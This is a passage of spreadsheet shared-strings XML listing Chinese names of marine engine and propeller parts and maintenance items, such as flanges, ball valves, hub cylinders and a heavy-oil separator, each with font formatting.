        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>镗孔套筒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钻床</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲式刮刀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直轨</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管，特殊外形</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通道部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰，外螺纹</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>腰形带颈法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方截面密封环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球阀，螺纹接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀门控制盒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导热层</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电线，</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电源电缆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灯接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>附件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白灯玻璃</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绿灯玻璃</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊链</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊索</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母，六角凸缘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母，特制六角</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母，特制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凹形导向装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊钩梁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>台车部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直管，锥型轧制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆颈法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球阀，电焊接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球阀，多头组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插装阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力安全阀，阀体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>探测灯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卡子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半球形轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓的紧固</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标示牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>倒置底定向</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>销规加长杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘式</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直式温度计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组件安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞，活塞杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓紧固数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>椎体拉伸距离</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端盖安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磁盘总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴刮环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀块机加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀块铸件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>小板块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叉臂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套和衬套总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢丝带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮传动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑块密封环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导销</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥形</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导销</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆柱形</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管口剖面图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叶片底脚再加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴校正</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维护程序</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叶片法兰检验单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴管套后部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴管套前部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刀具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端盖，毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轮毂总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轮毂气缸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轮毂气缸，毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叶片法兰毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叶片螺纹</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>块状阳极</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轮毂校正</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叶片底脚定距块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>箱体和轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叶片环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油箱板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀块，铸造</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油杯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁针</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叶片底脚防护罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>箭头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油备用泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管式冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管，重油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>嵌入式节流管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气放泄阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重油模数</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重油离心分油机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
